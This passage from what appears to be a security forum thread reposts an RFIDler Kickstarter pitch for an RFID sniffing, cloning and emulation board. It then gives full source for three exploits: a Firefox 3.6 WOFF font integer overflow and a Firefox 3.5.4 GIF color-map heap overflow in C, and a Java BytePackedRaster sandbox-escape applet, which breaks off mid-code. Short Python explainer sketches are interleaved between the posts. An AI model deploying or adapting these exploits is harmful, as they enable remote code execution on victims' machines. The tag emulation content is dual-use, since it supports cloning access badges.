Sniff conversations between external reader & tag
Provide raw as well as decoded data
Built-in antenna
External antenna connection
USB power and user interface
TTL interface
GPIO interface
JTAG interface for programming
USB Bootloader for easy firmware updating
External CLOCK interface if not using processor
External power connector if not using USB
The hardware gives you the capability to read/write/emulate more or less any LF tag, but we've also taken the hard work out of most of them by implementing all the tag types we can find in the public domain. These include:
EM4102 / Unique
Hitag 1/2/S
FDX-B (ISO 11784/5 Animal Standard)
Q5
T55xx
Indala
Noralsy
HID Prox
NXP PCF7931
Texas Instruments
VeriChip
FlexPass
Firmware We have working firmware that proves the concept, and we will continue to develop the code to provide both a command line interface and an API for end-user applications. This will be posted in a GitHub repository, here: https://github.com/ApertureLabsLtd/RFIDler Hardware The three devices we will produce are:
RFIDler-LF-Nekkid - The bare naked circuit board with built-in antenna, ready for you to populate the electronic components yourself.
RFIDler-LF-Lite - This is the board with only the low-level RFID communication components, to allow you to incorporate it into your own projects (e.g. controlling it with Arduino, Raspberry Pi, BeagleBone etc.), providing GPIO, power and clock interfaces only. Firmware can be ported from (and/or contributed to) the RFIDler repository, or you can write your own from scratch.
RFIDler-LF-Standard - This is the fully populated Low Frequency (125/134kHz) board with on-board processor that can be used as a stand-alone device for research and in-the-field testing etc., providing TTL and USB serial command line and API interfaces as well as raw GPIO, clock and power. 
Your pledges will help us get this from working prototype to final production run, and incorporate where possible any cool ideas/features that we hadn't thought of, and bring Software Defined RFID to the masses! The challenges we have left to complete are: Processor selection - we've used the Pic32 as a proof-of-concept chip, but there may be others better suited to this kind of application. We will research and test 2 or 3 other chips before making a final decision. Coil design - coils are almost as mysterious as RFID itself, so we need to try various designs to see which on-board and external coils give us the best performance across the target frequency ranges. Final Board Layout - Layout the final boards and send to manufacturing. Further Details Here is Adam's blog entry on the subject: Obviously a Major Malfunction...: RFIDler - An open source Software Defined RFID Reader/Writer/Emulator And here is the prototype: And here we are reading an Indala PSK tag: The logic analyser trace shows that RFIDler is pulsing on the PSK Reader line whenever there is a phase change on the analogue line (the small green pulses are negative, and the large ones positive). All our software has to do is detect those pulses at each bit period, and clock out the data. The 'Bitstream' line shows the software bit value detection in action, as it's being driven by the UBW32 board. The other nice thing we can do in software is monitor the quality of the read: the width of the reader pulse will narrow as the coil goes in and out of the field, and the coils 'de-couple', so we can flag a read error when the pulse gets too narrow. This is important when you're looking at unknown tag types: the manufacturer may have a built-in parity or other data checks so their native reader knows when it's getting a good read, but we don't have the knowledge of the relevant algorithms, so cannot do the same. With this technique, we can easily filter out bad reads that will give us corrupt data. 
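The read-quality idea described above (flag a read as bad when the reader pulse gets too narrow) can be sketched like this. The widths and threshold are made-up numbers; real values depend on the coil, the tag and the frequency:

```python
def filter_read(pulse_widths_us, bits, min_width_us=12.0):
    """Reject a decoded read if any bit period's reader pulse is too narrow.

    pulse_widths_us: one pulse-width measurement (microseconds) per bit period.
    bits:            the bits clocked out for those periods.
    Returns the bits if every pulse is wide enough, else None (bad read).
    """
    if len(pulse_widths_us) != len(bits):
        raise ValueError("expected one pulse measurement per bit period")
    ok = all(w >= min_width_us for w in pulse_widths_us)
    return bits if ok else None

good = filter_read([15.2, 14.8, 16.0], [1, 0, 1])
bad = filter_read([15.2, 3.1, 16.0], [1, 0, 1])  # coil de-coupled mid-read
```

This is exactly the fallback the post describes for unknown tag types: with no known parity or checksum algorithm, the analogue read quality is the only signal you have that the data is trustworthy.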
Of course, as well as reading a tag, we want to be the tag, so here we are emulating PSK: and we could do that for any bitrate, modulation scheme or data pattern (within reason), as well as have 2-way conversations (e.g. Hitag2). So that brings us to where we are now... Timeframe We've allowed the following timeframes for each stage:
Project starts in October (assuming we get funded!)
Full circuit design and CPU selection: 4 weeks, taking us to November.
Beta test phase: 6 weeks up to mid-December, then it's the Christmas & New Year break...
Final production run: 4 weeks starting in January, so we should be done by February.
We all know that in real life timescales slip, but since the underlying hardware is already proven in our prototype, and all we're really doing now is fine-tuning and incorporating feedback from the beta test, we expect this to be a fairly quick project! Risks and challenges We have great facilities in-house for prototyping electronic circuits, and so we expect the main challenges to have been worked out before we go to the trouble and expense of outside manufacturing. We also have a great relationship with our fab company, who we have used for several years on many successful projects, so we know they have the resources to get the job done. We look forward to working with you! Sursa: RFIDler - A Software Defined RFID Reader/Writer/Emulator by Aperture Labs Ltd. — Kickstarter
  14. [h=1]Mozilla Firefox 3.6 - Integer Overflow Exploit[/h]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h> /* unlink() */
#include <zlib.h>
/* x90c WOFF 1day exploit (MFSA2010-08 WOFF Heap Corruption due to Integer Overflow 1day exploit) CVE-ID: CVE-2010-1028 Full Exploit: http://www.exploit-db.com/sploits/27698.tgz Affected Products: - Mozilla Firefox 3.6 ( Gecko 1.9.2 ) - Mozilla Firefox 3.6 Beta1, 3, 4, 5 ( Beta2 ko not released ) - Mozilla Firefox 3.6 RC1, RC2 Fixed in: - Mozilla Firefox 3.6.2 ( the bug is fixed after version 3.6 ) security bug credit: Evgeny Legerov < intevydis.com > Timeline: 2010.02.01 - Evgeny Legerov initially discovered it and shipped it in "Immunity 3rd Party Product VulnDisco 9.0" https://forum.immunityinc.com/board/thread/1161/vulndisco-9-0/ 2010.02.18 - independently analyzed; Mozilla and Secunia were contacted before the advisory was reported http://secunia.com/advisories/38608 2010.03.19 - CVE registered http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1028 2010.03.22 - Mozilla advisory report http://www.mozilla.org/security/announce/2010/mfsa2010-08.html 2010.04.01 - x90c exploit (x90c.org) Compile: [root@centos5 woff]# gcc CVE-2010-1028_exploit.c -o CVE-2010-1028_exploit -lz rebel: greets to my old l33t hacker dude in sweden ... BSDaemon: and Invitation of l33t dude for exploit share #phrack@efnet, #social@overthewire x90c */ typedef unsigned int UInt32; typedef unsigned short UInt16; /* for above two types, some WOFF header struct uses big-endian byte order. 
*/ typedef struct { UInt32 signature; UInt32 flavor; UInt32 length; UInt16 numTables; UInt16 reserved; UInt32 totalSfntSize; UInt16 majorVersion; UInt16 minorVersion; UInt32 metaOffset; UInt32 metaLength; UInt32 metaOrigLength; UInt32 privOffset; UInt32 privLength; } WOFF_HEADER; typedef struct { UInt32 tag; UInt32 offset; UInt32 compLength; UInt32 origLength; UInt32 origChecksum; } WOFF_DIRECTORY; #define FLAVOR_TRUETYPE_FONT 0x00010000 #define FLAVOR_CFF_FONT 0x4F54544F struct ff_version { int num; char *v_nm; unsigned long addr; }; struct ff_version plat[] = { { 0, "Win XP SP3 ko - FF 3.6", 0x004E18ED }, { 1, "Win XP SP3 ko - FF 3.6 Beta1", 0x004E17BD }, { 2, "Win XP SP3 ko - FF 3.6 Beta3", 0x004E193D }, { 3, "Win XP SP3 ko - FF 3.6 Beta4", 0x004E20FD }, { 4, "Win XP SP3 ko - FF 3.6 Beta5", 0x600A225D }, { 5, "Win XP SP3 ko - FF 3.6 RC1", 0x004E17BD }, { 6, "Win XP SP3 ko - FF 3.6 RC2", 0x004E18ED }, { 0x00, NULL, 0x0 } }; void usage(char *f_nm) { int i = 0; fprintf(stdout, "\n Usage: %s [Target ID]\n\n", f_nm); for(i = 0; plat[i].v_nm != NULL; i++) fprintf(stdout, "\t{%d} %s.\n", (plat[i].num), (plat[i].v_nm)); exit(-1); } int main(int argc, char *argv[]) { WOFF_HEADER woff_header; WOFF_DIRECTORY woff_dir[1]; FILE *fp; char dataBlock[1024]; char compressed_dataBlock[1024]; char de_buf[1024]; int total_bytes = 0, total_dataBlock = 0; unsigned long destLen = 1024; unsigned long de_Len = 1024; unsigned long i = 0; unsigned long addr_saved_ret_val = 0; int ret = 0; int n = 0; if(argc < 2) usage(argv[0]); n = atoi(argv[1]); if(n < 0 || n > 6) { fprintf(stderr, "\nTarget number range is 0-6!\n"); usage(argv[0]); } printf("\n#### x90c WOFF exploit ####\n"); printf("\nTarget: %d - %s\n\n", (plat[n].num), (plat[n].v_nm)); // WOFF HEADER woff_header.signature = 0x46464F77; // 'wOFF' ( L.E ) woff_header.flavor = FLAVOR_TRUETYPE_FONT; // sfnt version ( B.E ) woff_header.length = 0x00000000; // woff file total length ( B.E ) woff_header.numTables = 0x0100; // 0x1 - woff dir entry length ( B.E ) woff_header.reserved = 0x0000; // res bit ( all zero ) // totalSfntSize value will bypass validation condition after integer overflow woff_header.totalSfntSize = 0x1C000000; // 0x0000001C ( B.E ) woff_header.majorVersion = 0x0000; // major version woff_header.minorVersion = 0x0000; // minor version woff_header.metaOffset = 0x00000000; // meta data block offset ( not used ) woff_header.metaLength = 0x00000000; // meta data block length ( not used ) woff_header.metaOrigLength = 0x00000000; // meta data block before-compressed length ( not used ) woff_header.privOffset = 0x00000000; // Private data block offset ( not used ) woff_header.privLength = 0x00000000; // Private data block length woff_dir[0].tag = 0x54444245; // 'EBDT' ( B.E ) woff_dir[0].offset = 0x40000000; // 0x00000040 ( B.E ) woff_dir[0].compLength = 0x00000000; // ( B.E ) // to trigger field bit. // 0xFFFFFFF8-0xFFFFFFFF value to trigger integer overflow. 
// 1) calculation result is 0, it's bypass to sanityCheck() function // 2) passed very long length into zlib Decompressor, it's trigger memory corruption! // 0xFFFFFFFD-0xFFFFFFFF: bypass sanityCheck() // you can use only the value of 0xFFFFFFFF ( integer overflow!!! ) // you can't using other values to bypass validation condition woff_dir[0].origLength = 0xFFFFFFFF; // 0xFFFFFFFF ( B.E ) printf("WOFF_HEADER [ %d bytes ]\n", sizeof(WOFF_HEADER)); printf("WOFF_DIRECTORY [ %d bytes ]\n", sizeof(WOFF_DIRECTORY)); // to compress data block // [ 0x0c0c0c0c 0x0c0c0c0c 0x0c0c0c0c ... ] // ...JIT spray stuff... addr_saved_ret_val = plat[n].addr; addr_saved_ret_val += 0x8; // If add 8bytes it reduced reference error occurs for(i = 0; i < sizeof(dataBlock); i+=4) // 0x004E18F5 { dataBlock[i+0] = (addr_saved_ret_val & 0x000000ff); dataBlock[i+1] = (addr_saved_ret_val & 0x0000ff00) >> 8; dataBlock[i+2] = (addr_saved_ret_val & 0x00ff0000) >> 16; dataBlock[i+3] = (addr_saved_ret_val & 0xff000000) >> 24; } // compress dataBlock with zlib's compress() if(compress((Bytef *)compressed_dataBlock, (uLongf *)&destLen, (Bytef *)dataBlock, (uLong)(sizeof(dataBlock)) ) != Z_OK) { fprintf(stderr, "Zlib compress failed!\n"); exit(-1); } printf("\nZlib compress(dataBlock) ...\n"); printf("DataBlock [ %u bytes ]\n", sizeof(dataBlock)); printf("Compressed DataBlock [ %u bytes ]\n", destLen); printf("[ Z_OK ]\n\n"); total_bytes = sizeof(WOFF_HEADER) + sizeof(WOFF_DIRECTORY) + destLen; total_dataBlock = destLen; printf("Total WOFF File Size: %d bytes\n", total_bytes); // byte order change to total_bytes, total_dataBlock ( L.E into B.E ) total_bytes = ((total_bytes & 0xff000000) >> 24) | ((total_bytes & 0x00ff0000) >> 8) | ((total_bytes & 0x0000ff00) << 8) | ((total_bytes & 0x000000ff) << 24); woff_header.length = total_bytes; total_dataBlock = ((total_dataBlock & 0xff000000) >> 24) | ((total_dataBlock & 0x00ff0000) >> 8) | ((total_dataBlock & 0x0000ff00) << 8) | ((total_dataBlock & 0x000000ff) 
<< 24); woff_dir[0].compLength = total_dataBlock; // create attack code data if((fp = fopen("s.woff", "wb")) == NULL) { fprintf(stderr, "failed to create the output file\n"); exit(-2); } // setup WOFF data store fwrite(&woff_header, 1, sizeof(woff_header), fp); fwrite(&woff_dir[0], 1, sizeof(woff_dir[0]), fp); fwrite(&compressed_dataBlock, 1, destLen, fp); fclose(fp); // zlib extract test ret = uncompress((Bytef *)de_buf, &de_Len, (Bytef *)compressed_dataBlock, destLen); if(ret != Z_OK) { switch(ret) { case Z_MEM_ERROR: printf("Z_MEM_ERROR\n"); break; case Z_BUF_ERROR: printf("Z_BUF_ERROR\n"); break; case Z_DATA_ERROR: printf("Z_DATA_ERROR\n"); break; } fprintf(stderr, "Zlib uncompress test failed!\n"); unlink("./s.woff"); exit(-3); } printf("\nZlib uncompress test(compressed_dataBlock) ...\n"); printf("[ Z_OK ]\n\n"); return 0; } /* eof */ Sursa: Mozilla Firefox 3.6 - Integer Overflow Exploit
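The manual byte-order swap and the origLength trick in the exploit above are easier to see in isolation. A quick sketch follows; the browser-side sanity check itself isn't shown in the exploit, so the rounding below only models what its comments describe:

```python
def bswap32(x: int) -> int:
    """Mirror the C byte-order swap used in the exploit (L.E <-> B.E)."""
    return (((x & 0xff000000) >> 24) | ((x & 0x00ff0000) >> 8) |
            ((x & 0x0000ff00) << 8) | ((x & 0x000000ff) << 24))

# totalSfntSize is stored as 0x1C000000 so the big-endian file bytes
# read back as 0x0000001C on the parsing side:
assert bswap32(0x0000001C) == 0x1C000000

# origLength = 0xFFFFFFFF: rounding it up to a 4-byte boundary in 32-bit
# arithmetic wraps to 0, which slips past the size sanity check while a
# huge length is still handed to the zlib decompressor (per the exploit's
# comments: "calculation result is 0, it's bypass to sanityCheck()").
orig_length = 0xFFFFFFFF
rounded = ((orig_length + 3) & 0xFFFFFFFF) & 0xFFFFFFFC
```

The swap is an involution, so applying it twice round-trips any value, which is a cheap self-test when hand-building headers like this.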
  15. [h=1]Mozilla Firefox 3.5.4 - Local Color Map Exploit[/h]
#include <stdio.h>
#include <stdlib.h>
#include <string.h> /* memset() */
/* x90c local color map 1day exploit CVE-2009-3373 Firefox local color map 1day exploit (MFSA 2009-56 Firefox local color map parsing heap overflow) Full Exploit: http://www.exploit-db.com/sploits/27699.tgz vulnerable: - Firefox 3.5.4 <= - Firefox 3.0.15 <= - SeaMonkey 2.0 <= x90c */ struct _IMAGE { char GCT_size; // global color map size char Background; // backcolor( select in global color map entry ) char default_pixel_ratio; // 00 char gct[4][3]; // 4 entries of global color map( 1bit/1pixel ) // char app_ext[19]; // application extension 19bytes ( to enable animation ) char gce[2]; // '!' GCE Label = F9 char ext_data; // 04 = 4 bytes of extension data char trans_color_ind; // use transparent color? ( 0/1 ) char ani_delay[2]; // 00 00 ( micro seconds delay in animation ) char trans; // color map entry to apply transparent color ( applied first image ) char terminator1; // 0x00 char image_desc; // ',' char NW_corner[4]; // 00 00 00 00 (0, 0) image put position char canvas_size[4]; // 03 00 05 00 ( 3x5 ) logical canvas size char local_colormap; // 80 use local color map? 
( last bottom 3bits are bits per pixel) char lct[4][3]; // local color map ( table ) char LZW_min; // 02 ( LZW data length -1 ) char encoded_image_size;// 03 ( LZW data length ) char image_data[1]; // LZW encoded image data char terminator2; // 0x00 } IMAGE; struct _IMAGE1 { char image_desc; // ',' char NW_corner[4]; // 00 00 00 00 (0, 0) char canvas_size[4]; // 03 00 05 00 ( 3x5 ) char local_colormap; // 00 = no local color map char lct[7][3]; // local color map char lcta[1][2]; // char LZW_min; // 08 // char encoded_image_size; // 0B ( 11 bytes ) // char image_data[9]; // encoded image data //char terminator2; // 0x00 } IMAGE1; struct _GIF_HEADER { char MAGIC[6]; // GIF89a unsigned short canvas_width; // 03 00 unsigned short canvas_height; // 05 00 struct _IMAGE image; struct _IMAGE1 image1; // char trailler; // ; // GIF file trailer } GIF_HEADER; int main(int argc, char *argv[]) { struct _GIF_HEADER gif_header; int i = 0; // (1) first image frame to LZW data, proper dummy ( it's can't put graphic ) // char data[3] = "\x84\x8F\x59"; char data[3] = "\x00\x00\x00"; // (2) second image frame to LZW data, backcolor changed by reference local color map char data1[9] = "\x84\x8F\x59\x84\x8F\x59\x84\x8F\x59"; char app_ext[19] = "\x21\xFF\x0B\x4E\x45\x54\x53\x43\x41\x50\x45\x32\x2E\x30\x03\x01\x00\x00\x00"; // animation tag ( not use ) FILE *fp; memset(&gif_header, 0, sizeof(gif_header)); // MAGIC ( GIF87a ) last version - support alpha value(transparency) gif_header.MAGIC[0] = '\x47'; gif_header.MAGIC[1] = '\x49'; gif_header.MAGIC[2] = '\x46'; gif_header.MAGIC[3] = '\x38'; gif_header.MAGIC[4] = '\x39'; gif_header.MAGIC[5] = '\x61'; // LOGICAL CANVAS gif_header.canvas_width = 3; // global canvas width length gif_header.canvas_height = 5; // height length // GLOBAL HEADER ( included global header, if local color map exists, not used global color map ) gif_header.image.GCT_size = '\x81'; // 81 gif_header.image.Background = '\x00'; // global color table #2 ( black ) 
gif_header.image.default_pixel_ratio = '\x00'; // 00 ( Default pixel aspect ratio ) // gct ( [200][3] ) gif_header.image.gct[0][0] = '\x43'; gif_header.image.gct[0][1] = '\x43'; gif_header.image.gct[0][2] = '\x43'; gif_header.image.gct[1][0] = '\x43'; gif_header.image.gct[1][1] = '\x43'; gif_header.image.gct[1][2] = '\x43'; gif_header.image.gct[2][0] = '\x43'; gif_header.image.gct[2][1] = '\x43'; gif_header.image.gct[2][2] = '\x43'; gif_header.image.gct[3][0] = '\x43'; gif_header.image.gct[3][1] = '\x43'; gif_header.image.gct[3][2] = '\x43'; /* for(i = 0; i < 19; i++) { gif_header.image.app_ext = app_ext; }*/ gif_header.image.gce[0] = '!'; gif_header.image.gce[1] = '\xF9'; gif_header.image.ext_data = '\x04'; gif_header.image.trans_color_ind = '\x00'; // no use transparent color gif_header.image.ani_delay[0] = '\x00'; // C8 = 2 seconds delay ( animation ) gif_header.image.ani_delay[1] = '\x00'; gif_header.image.trans = '\x00'; // no use transparent color ( color map ) gif_header.image.terminator1 = '\x00'; // IMAGE Header gif_header.image.image_desc = ','; gif_header.image.NW_corner[0] = '\x00'; // 0,0 position gif_header.image.NW_corner[1] = '\x00'; gif_header.image.NW_corner[2] = '\x00'; gif_header.image.NW_corner[3] = '\x00'; gif_header.image.canvas_size[0] = '\x03'; // 3 x 5 canvas gif_header.image.canvas_size[1] = '\x00'; gif_header.image.canvas_size[2] = '\x05'; gif_header.image.canvas_size[3] = '\x00'; gif_header.image.local_colormap = 0x80; // use local color map // gif_header.image.local_colormap |= 0x40; // image formatted in Interlaced order //gif_header.image.local_colormap |= 0x4; // pixel of local color map //gif_header.image.local_colormap |= 0x2; // 2 bits. gif_header.image.local_colormap |= 0x1; // bits per pixel. 
( black/white ) gif_header.image.lct[0][0] = '\x42'; // R ( red ) gif_header.image.lct[0][1] = '\x42'; gif_header.image.lct[0][2] = '\x42'; gif_header.image.lct[1][0] = '\x42'; gif_header.image.lct[1][1] = '\x42'; // G ( green ) gif_header.image.lct[1][2] = '\x42'; // b ( blue ) gif_header.image.lct[2][0] = '\x42'; gif_header.image.lct[2][1] = '\x42'; gif_header.image.lct[2][2] = '\x42'; gif_header.image.lct[3][0] = '\x42'; gif_header.image.lct[3][1] = '\x42'; gif_header.image.lct[3][2] = '\x42'; // RASTER DATA gif_header.image.LZW_min = '\x00'; // total encode data - 1 gif_header.image.encoded_image_size = '\x01'; // 255 bytes // encoded data for(i = 0; i < 1; i++) { gif_header.image.image_data[i] = 0xFF; } // RASTER DATA EOF gif_header.image.terminator2 = '\x00'; // -------------------------------------------------- // ------------- IMAGE1 ----------------------------- gif_header.image1.image_desc = ','; gif_header.image1.NW_corner[0] = '\x00'; // (0, 0) gif_header.image1.NW_corner[1] = '\x00'; gif_header.image1.NW_corner[2] = '\x00'; gif_header.image1.NW_corner[3] = '\x00'; gif_header.image1.canvas_size[0] = '\x03'; // 3 x 5 gif_header.image1.canvas_size[1] = '\x00'; gif_header.image1.canvas_size[2] = '\x05'; gif_header.image1.canvas_size[3] = '\x00'; gif_header.image1.local_colormap = 0x80; // use local color map // gif_header.image1.local_colormap |= 0x40; // image formatted in Interlaced order //gif_header.image1.local_colormap |= 0x4; // pixel of local color map 4 pixel gif_header.image1.local_colormap |= 0x2; //gif_header.image1.local_colormap |= 0x1; // 1bit per pixel. // below values will be used as return addr for(i = 0; i < 7; i++) // second image frame's local color map entry length is 8 { gif_header.image1.lct[i][0] = '\x0c'; // (RET & 0x00FF0000) gif_header.image1.lct[i][1] = '\x0c'; // (RET & 0xFF00FF00) gif_header.image1.lct[i][2] = '\x0c'; // (RET & 0x000000FF) } gif_header.image1.lcta[0][0] = '\x0c'; gif_header.image1.lcta[0][1] = '\x0c'; //} // RASTER DATA //gif_header.image1.LZW_min = 0x00;//'\x05'; //gif_header.image1.encoded_image_size = 0x00;//'\x06';*/ // encoded data /* for(i = 0; i < 9; i++) { gif_header.image1.image_data[i] = 0xFF;//data1[i]; }*/ // RASTER DATA // second image frame's last byte ignored ( null terminator, GIF total trailer ) //gif_header.image1.terminator2 = '\x00'; //gif_header.trailler = ';'; // -------------------------------------------------- fp = fopen("a.gif", "wb"); printf("%d\n", (int)sizeof(struct _GIF_HEADER)); fwrite(&gif_header, sizeof(struct _GIF_HEADER) - 1, 1, fp); fclose(fp); system("xxd ./a.gif"); } Sursa: Mozilla Firefox 3.5.4 - Local Color Map Exploit
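The packed flag bytes in the code above encode the color-table sizes that drive the bug. Per the GIF89a specification, a color table has 2^(N+1) entries of 3 bytes each, where N is the low three bits of the packed field and bit 7 says whether a table is present at all (this sketch is spec-based, not taken from the Firefox parser):

```python
def color_table_entries(packed: int) -> int:
    """Number of color-table entries implied by a GIF packed flags byte.

    GIF89a: bit 7 = table present, low three bits N give 2**(N+1) entries.
    """
    if not packed & 0x80:
        return 0
    return 2 ** ((packed & 0x07) + 1)

# First frame: 0x80 | 0x01 -> 4 entries (matches lct[4][3] in the struct).
# Second frame: 0x80 | 0x02 -> 8 entries, more than the first frame led the
# parser to allocate for; the oversized table is the heart of the overflow,
# and its '\x0c' bytes become the attacker-controlled return address.
```

This is why the exploit fills seven-and-a-bit entries with 0x0c: the parser walks 8 declared entries into a buffer sized for fewer.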
  16. Packet Storm Exploit 2013-0819-1 - Oracle Java BytePackedRaster.verify() Signed Integer Overflow Site packetstormsecurity.com The BytePackedRaster.verify() method in Oracle Java versions prior to 7u25 is vulnerable to a signed integer overflow that allows bypassing of "dataBitOffset" boundary checks. This exploit code demonstrates remote code execution by popping calc.exe. It was obtained through the Packet Storm Bug Bounty program. import java.awt.CompositeContext;import java.awt.image.*; import java.awt.color.*; import java.beans.Statement; import java.security.*; public class MyJApplet extends javax.swing.JApplet { /** * Initializes the applet myJApplet */ @Override public void init() { /* Set the Nimbus look and feel */ //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) "> /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel. * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html */ try { for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) { if ("Nimbus".equals(info.getName())) { javax.swing.UIManager.setLookAndFeel(info.getClassName()); break; } } } catch (ClassNotFoundException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (InstantiationException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (IllegalAccessException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (javax.swing.UnsupportedLookAndFeelException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } //</editor-fold> /* Create and display the applet */ try { java.awt.EventQueue.invokeAndWait(new Runnable() { public void run() { initComponents(); // 
print environment info logAdd( "JRE: " + System.getProperty("java.vendor") + " " + System.getProperty("java.version") + "\nJVM: " + System.getProperty("java.vm.vendor") + " " + System.getProperty("java.vm.version") + "\nJava Plug-in: " + System.getProperty("javaplugin.version") + "\nOS: " + System.getProperty("os.name") + " " + System.getProperty("os.arch") + " (" + System.getProperty("os.version") + ")" ); } }); } catch (Exception ex) { ex.printStackTrace(); } } public void logAdd(String str) { txtArea.setText(txtArea.getText() + str + "\n"); } public void logAdd(Object o, String... str) { logAdd((str.length > 0 ? str[0]:"") + (o == null ? "null" : o.toString())); } public String errToStr(Throwable t) { String str = "Error: " + t.toString(); StackTraceElement[] ste = t.getStackTrace(); for(int i=0; i < ste.length; i++) { str += "\n\t" + ste[i].toString(); } t = t.getCause(); if (t != null) str += "\nCaused by: " + errToStr(t); return str; } public void logError(Exception ex) { logAdd(errToStr(ex)); } public static String toHex(int i) { return Integer.toHexString(i); } /** * This method is called from within the init() method to initialize the * form. WARNING: Do NOT modify this code. The content of this method is * always regenerated by the Form Editor. 
*/ @SuppressWarnings("unchecked") // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents private void initComponents() { btnStart = new javax.swing.JButton(); jScrollPane2 = new javax.swing.JScrollPane(); txtArea = new javax.swing.JTextArea(); btnStart.setText("Run calculator"); btnStart.addMouseListener(new java.awt.event.MouseAdapter() { public void mousePressed(java.awt.event.MouseEvent evt) { btnStartMousePressed(evt); } }); txtArea.setEditable(false); txtArea.setColumns(20); txtArea.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N txtArea.setRows(5); txtArea.setTabSize(4); jScrollPane2.setViewportView(txtArea); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); getContentPane().setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE) .addContainerGap()) .addGroup(layout.createSequentialGroup() .addGap(242, 242, 242) .addComponent(btnStart, javax.swing.GroupLayout.PREFERRED_SIZE, 124, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 344, Short.MAX_VALUE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) .addComponent(btnStart) .addContainerGap()) ); }// </editor-fold>//GEN-END:initComponents private boolean _isMac = System.getProperty("os.name","").contains("Mac"); private boolean _is64 = System.getProperty("os.arch","").contains("64"); private int tryExpl() { try { // alloc aux vars String name = "setSecurityManager"; Object[] o1 = new 
Object[1]; Object o2 = new Statement(System.class, name, o1); // make a dummy call for init // allocate byte buffer for destination Raster DataBufferByte dst = new DataBufferByte(9); // allocate the target array right after dst[] int[] a = new int[8]; // allocate an object array right after a[] Object[] oo = new Object[7]; // create Statement with the restricted AccessControlContext oo[2] = new Statement(System.class, name, o1); // create powerful AccessControlContext Permissions ps = new Permissions(); ps.add(new AllPermission()); oo[3] = new AccessControlContext( new ProtectionDomain[]{ new ProtectionDomain( new CodeSource( new java.net.URL("file:///"), new java.security.cert.Certificate[0] ), ps ) } ); // store System.class pointer in oo[] oo[4] = ((Statement)oo[2]).getTarget(); // save old a.length int oldLen = a.length; logAdd("a.length = 0x" + toHex(oldLen)); // prepare source buffer DataBufferByte src = new DataBufferByte(8); for(int i=0; i<8; i++) src.setElem(i,-1); // create normal source raster MultiPixelPackedSampleModel sm1 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,1,1,4,0); WritableRaster wr1 = Raster.createWritableRaster(sm1, src, null); // create MultiPixelPackedSampleModel with malformed "scanlineStride" and "dataBitOffset" fields MultiPixelPackedSampleModel sm2 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,2,1, 0x3fffffdd - (_is64 ? 16:0), 288 + (_is64 ? 
128:0)); // create destination BytePackedRaster basing on sm2 WritableRaster wr2 = Raster.createWritableRaster(sm2, dst, null); logAdd(wr2); // create sun.java2d.SunCompositeContext byte[] bb = new byte[] { 0, -1 }; IndexColorModel cm = new IndexColorModel(1, 2, bb, bb, bb); CompositeContext cc = java.awt.AlphaComposite.Src.createContext(cm, cm, null); logAdd(cc); // call native Java_sun_awt_image_BufImgSurfaceData_initRaster() (see ...\jdk\src\share\native\sun\awt\image\BufImgSurfaceData.c) // and native Java_sun_java2d_loops_Blit_Blit() (see ...\jdk\src\share\native\sun\java2d\loops\Blit.c) cc.compose(wr1, wr2, wr2); // check results: a.length should be overwritten by 0xF8 int len = a.length; logAdd("a.length = 0x" + toHex(len)); if (len == oldLen) { // check a[] content corruption // for RnD for(int i=0; i < len; i++) if (a[i] != 0) logAdd("a["+i+"] = 0x" + toHex(a[i])); // exit logAdd("error 1"); return 1; } // ok, now we can read/write outside the real a[] storage, // lets find our Statement object and replace its private "acc" field value // search for oo[] after a[oldLen] boolean found = false; int ooLen = oo.length; for(int i=oldLen+2; i < oldLen+32; i++) if (a[i-1]==ooLen && a[i]==0 && a[i+1]==0 // oo[0]==null && oo[1]==null && a[i+2]!=0 && a[i+3]!=0 && a[i+4]!=0 // oo[2,3,4] != null && a[i+5]==0 && a[i+6]==0) // oo[5,6] == null { // read pointer from oo[4] int stmTrg = a[i+4]; // search for the Statement.target field behind oo[] for(int j=i+7; j < i+7+64; j++){ if (a[j] == stmTrg) { // overwrite default Statement.acc by oo[3] ("AllPermission") a[j-1] = a[i+3]; found = true; break; } } if (found) break; } // check results if (!found) { // print the memory dump on error // for RnD String s = "a["+oldLen+"...] 
